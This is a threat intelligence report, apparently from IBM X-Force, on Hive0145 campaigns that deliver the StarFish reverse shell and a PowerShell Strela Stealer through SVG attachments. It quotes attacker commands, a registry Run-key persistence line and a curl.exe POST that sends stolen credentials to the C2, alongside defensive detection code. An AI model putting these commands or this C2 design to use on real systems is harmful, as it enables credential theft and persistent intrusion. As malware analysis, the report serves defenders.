Hive0145 back in German inboxes with Strela Stealer and a backdoor

As of early June 2025, IBM X-Force observed new phishing campaigns attributed to Hive0145. This threat actor is known for their delivery of Strela Stealer to exfiltrate email credentials since at least 2022. Hive0145's latest campaigns targeting Germany make use of malicious SVG files to download a simple reverse shell that X-Force named StarFish. The StarFish script supports persistent access and the deployment of follow-on payloads for the first time. This new capability marks a clear shift in intent for the threat actor and translates into a higher risk for victims in comparison to previous campaigns. Among the observed secondary payloads were a screenshot module and a PowerShell-based implementation of Strela Stealer.

Key findings:

  • Hive0145 continues to target Germany in high-volume phishing campaigns through June and July 2025
  • As of June 2025, Hive0145 uses SVG files to drop a reverse shell malware, StarFish, enabling persistent access to infected machines
  • Among the secondary payloads, X-Force discovered a screenshot module and a PowerShell-based implementation of Strela Stealer

Background

X-Force first began observing heightened activity from Hive0145 in April 2023. This threat actor is assessed to be financially motivated and is likely functioning as an initial access broker (IAB). Hive0145 stands out from the threat landscape due to its evolving techniques and tightly limited scope of actions on the objective, with a central focus on email credentials. The group is believed to be the exclusive operator of Strela Stealer, a credential-harvesting malware designed to extract login information from Microsoft Outlook and Mozilla Thunderbird. Although the malware has been implemented in C, .NET and now PowerShell, its original functionality has not changed. This kind of data theft often sets the stage for Business Email Compromise (BEC) attacks.

IABs like Hive0145 play a crucial role in the cyber criminal ecosystem by acquiring and selling access to compromised environments. They typically offload stolen credentials and other valuable data to third-party actors who specialize in other aspects of the attack chain. While this is standard practice for IABs, it remains unclear whether Hive0145 is aligned with any specific buyers or affiliates when distributing access gained through their operations.


Previous activity

Hive0145’s activity began in late 2022 with basic phishing campaigns delivering Strela Stealer via malicious email attachments. These early efforts primarily targeted Spanish-speaking users and focused on credential theft from Outlook and Thunderbird. The emails used generic invoice lures and relied on basic social engineering tactics.

By early 2023, Hive0145 expanded its targeting to include users in Germany and Italy. These campaigns showed improved localization, using translated lures and more region-specific content. The malware delivery remained attachment-based, but the phishing emails grew more tailored to increase credibility. Around mid-2024, the actor shifted to a more advanced technique: hijacking legitimate invoice emails. They would manipulate real stolen emails and replace original attachments with weaponized ZIP files containing obfuscated JavaScript loaders.

In late 2023 and early 2024, Hive0145 incorporated polyglot files, valid code-signing certificates and new crypters like Stellar Loader to improve evasion. The targeting expanded further to include systems with Catalan, Polish and Basque locales, showing broader regional intent. By mid-2024, campaigns became more frequent and structured, with Hive0145 launching phishing waves on a near-weekly basis. Ukrainian targets were added to the scope, and Strela Stealer was updated to collect system metadata and application inventories, signaling a shift toward more comprehensive reconnaissance alongside credential theft.

June/July 2025 activity

In early June 2025, X-Force observed another Hive0145 email phishing campaign targeting Germany. The threat actors used real emails, likely stolen from previous infections, along with the corresponding attachment name. The attachment is replaced with an .SVG (Scalable Vector Graphics) file that keeps the original filename to maintain the appearance of authenticity. All emails successfully pass an SPF (Sender Policy Framework) check, suggesting that the emails are indeed being sent from a legitimate domain and not being spoofed. The vast majority of emails and attachment names contain the German word "Rechnung" ("invoice") and were dated between January and May 2025.

Fig. 1: Real invoice email with hijacked attachment (SVG) used in Hive0145 phishing campaign

The initial campaign lasted from June 4th until June 19th and used SVG files with embedded HTML to download a ZIP file containing a malicious JScript (JS). The first wave only used a handful of different download domains in the malicious SVG droppers, all of which were taken down shortly after the campaign began, which likely limited the number of successful downloads.

Fig. 2: Hive0145 campaigns targeting Germany in June and July 2025

On July 3rd, Hive0145 returned with a high-volume campaign featuring a significantly larger pool of malicious domains.

Technical details

If the victim opens the SVG file on their machine, the browser will render the embedded HTML:

Fig. 3: Rendered SVG file

The HTML displays a progress bar and loads a remote script responsible for downloading a ZIP file:

Fig. 4: Embedded HTML loading remote script

The dropped ZIP file carries a name suggesting it contains the document the victim expects. Instead, it contains an obfuscated JScript file which implements a simple reverse shell called StarFish. This is the first time that Hive0145 has been observed deploying backdoor malware, and it demonstrates a clear change in intent: the actor can now deploy arbitrary payloads.

StarFish reverse shell

Upon execution, the StarFish script generates a unique victim ID by combining the machine's product ID and computer name. It then sends an HTTP GET request to a hardcoded command and control (C2) server's "server.php" endpoint. The server responds with the string "OK", immediately followed by an optional command, which is directly executed on the machine via cmd.exe. Should the command contain the placeholder string "%SCRIPT_NAME%", it will be replaced with the reverse shell's path. The output of the command is sent back as a POST request after command completion or a specified maximum time limit.

The first C2 command is always aimed at achieving persistence for the reverse shell through the registry:

REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "System Update2" /t REG_SZ /F /D "wscript.exe ""%SCRIPT_NAME%""

StarFish continues to request new commands every 48 seconds. The final Strela Stealer payload is only dropped after passing anti-sandbox checks, including an extended time of constant beaconing and a successful screenshot capture.
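The two observable behaviours described above, a fixed 48-second GET beacon to the C2 endpoint and a Run-key persistence entry written with reg.exe and wscript.exe, can be turned into simple proxy-log and process-command-line checks. The Python below is an added example, not code from the X-Force report: the proxy log format, the 10.0.0.x clients and the c2.example.invalid host are constructed assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed proxy log (timestamp client method url); not traffic from the campaign.
PROXY_LOG = """\
2025-07-03T09:00:00 10.0.0.7 GET http://c2.example.invalid/server.php?id=PRODID-HOST1
2025-07-03T09:00:48 10.0.0.7 GET http://c2.example.invalid/server.php?id=PRODID-HOST1
2025-07-03T09:00:49 10.0.0.7 POST http://c2.example.invalid/server.php?id=PRODID-HOST1
2025-07-03T09:01:36 10.0.0.7 GET http://c2.example.invalid/server.php?id=PRODID-HOST1
2025-07-03T09:02:24 10.0.0.7 GET http://c2.example.invalid/server.php?id=PRODID-HOST1
2025-07-03T09:00:05 10.0.0.9 GET http://news.example.invalid/index.php
2025-07-03T09:07:11 10.0.0.9 GET http://news.example.invalid/index.php
2025-07-03T09:20:40 10.0.0.9 GET http://news.example.invalid/index.php
2025-07-03T09:30:02 10.0.0.9 GET http://news.example.invalid/index.php
"""
LINE_RE = re.compile(r"^(\S+) (\S+) (GET|POST) (\S+)$")

def parse_proxy_log(text):
    """Parse log lines into (timestamp, client, method, url-without-query) tuples."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, client, method, url = m.groups()
            rows.append((datetime.fromisoformat(ts), client, method, url.split("?", 1)[0]))
    return rows

def find_beacons(rows, period=48.0, tolerance=5.0, min_requests=4):
    """Return (client, url) pairs whose GET timing matches a fixed period (48 s for StarFish)."""
    series = defaultdict(list)
    for ts, client, method, url in rows:
        if method == "GET":
            series[(client, url)].append(ts)
    hits = []
    for key, stamps in series.items():
        if len(stamps) < min_requests:
            continue
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        # A scripted beacon keeps a stable gap; human browsing shows a wide spread.
        if abs(statistics.median(gaps) - period) <= tolerance and statistics.pstdev(gaps) <= tolerance:
            hits.append(key)
    return hits

# reg.exe writing a Run key whose value launches wscript.exe (the REG ADD command quoted above).
RUN_KEY_RE = re.compile(
    r'reg(?:\.exe)?\s+add\s+"?(?:HKCU|HKEY_CURRENT_USER)\\SOFTWARE\\Microsoft\\Windows'
    r'\\CurrentVersion\\Run"?.*wscript\.exe', re.IGNORECASE)

def is_run_key_wscript_persistence(cmdline):
    """True when a process command line matches the StarFish persistence pattern."""
    return bool(RUN_KEY_RE.search(cmdline))
```

In practice the beacon check is run per client over a sliding window of proxy or NetFlow data, and the command-line check over process-creation events (Sysmon event 1 or Windows 4688).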

Screen capture

After several minutes of beaconing, the next stage is executed: a PowerShell script named "sc.ps1" downloaded from the same server.

Fig. 5: Screen capture PowerShell script

The script takes a screenshot of the victim's current screen and attempts to upload it to the 0x0 free file hoster (https://git.0x0.st/mia/0x0). After a successful upload, the file hoster sends back a unique URL to view the screenshot, which is relayed back to the C2 server via the reverse shell.

Strela Stealer PowerShell edition

The final payload is another PowerShell script downloaded from the server's "strel.php" endpoint. The script is a direct implementation of the original Strela Stealer behavior as observed in all past Hive0145 campaigns. The stealer attempts to extract, decrypt and exfiltrate email inbox credentials from the Thunderbird and Microsoft Outlook email clients.

Fig. 6: Excerpt of Strela Stealer PowerShell script

Any harvested credentials are stored in a temporary file and exfiltrated via the curl command to the server's "up2.php" endpoint:

curl.exe -X POST --data-binary "@$tempFile" $headerArgs $Uri -s -S 2>&1

X-Force also observed the "invoice.php" endpoint on the C2 server attempting to download or display a PDF, "invoice.pdf". This is likely used as a decoy measure and has been observed in previous Strela Stealer campaigns orchestrated by Hive0145.

Conclusion

Hive0145 is a highly capable threat actor showing a strong motivation to adapt over the past years. With the latest campaign's shift towards backdoor malware with persistent access, the threat actor demonstrates clear intent and capability to evolve repeatedly and increase their scope outside of traditional email credential harvesting. The refinement in the infection process, which now deploys Strela Stealer only after prolonged beaconing and screen capture, underscores the increasing intent of the threat actor to evade analysis and research of later-stage payloads. Lastly, Hive0145's unique approach to phishing is likely one of the main keys to its success, enabling high-volume campaigns across targeted geographies.

Recommendations

X-Force recommends organizations:

  • Exercise caution with emails and ZIP archive attachments
  • Employ detection rules for malicious SVG files that execute JavaScript and drop further payloads
  • Consider changing the default application for JavaScript/JScript/VBScript files to Notepad
  • Monitor curl.exe processes potentially exfiltrating data
  • Install and configure endpoint security software
  • Update relevant network security monitoring rules
  • Educate staff on the potential threats to the organization
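The recommendation to detect SVG files that execute JavaScript, applied to the embedded-HTML technique described under Technical details: an added example, not tooling from the report. It statically scans an SVG for script elements, foreignObject blocks, event-handler attributes and javascript: URLs, and treats malformed XML as suspicious; the two sample SVGs and the staging.example.invalid host are constructed.

```python
import xml.etree.ElementTree as ET

# Two SVG documents constructed for this example; neither is a file from the campaign.
BENIGN_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">
  <rect width="10" height="10" fill="blue"/>
</svg>"""
SUSPICIOUS_SVG = """<svg xmlns="http://www.w3.org/2000/svg" onload="init()">
  <foreignObject width="100%" height="100%">
    <div xmlns="http://www.w3.org/1999/xhtml">
      <progress value="30" max="100"></progress>
      <script src="https://staging.example.invalid/r.js"></script>
    </div>
  </foreignObject>
</svg>"""

def localname(qname):
    """Strip the {namespace} prefix ElementTree puts on tag and attribute names."""
    return qname.rsplit("}", 1)[-1].lower()

def scan_svg(svg_text):
    """Return findings for active content in an SVG document; [] means nothing was found."""
    findings = []
    try:
        root = ET.fromstring(svg_text)
    except ET.ParseError as exc:
        # Mail gateways should not pass on what the parser cannot read.
        return [f"not well-formed XML ({exc}); treat as suspicious"]
    for el in root.iter():
        name = localname(el.tag)
        if name == "script":
            src = next((v for k, v in el.attrib.items() if localname(k) in ("src", "href")), None)
            findings.append(f"script element loading {src}" if src else "inline script element")
        elif name == "foreignobject":
            findings.append("foreignObject (embedded HTML inside the SVG)")
        for attr, value in el.attrib.items():
            a = localname(attr)
            if a.startswith("on"):
                findings.append(f"event handler {a} on <{name}>")
            elif a == "href" and value.strip().lower().startswith("javascript:"):
                findings.append(f"javascript: URL on <{name}>")
    return findings

def is_suspicious_svg(svg_text):
    """Policy used by this example: any finding is enough to quarantine the attachment."""
    return bool(scan_svg(svg_text))
```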



Authors

Golo Mühr

Malware Reverse Engineer

IBM

Chris Caridi

Strategic Threat Analyst

IBM X-Force
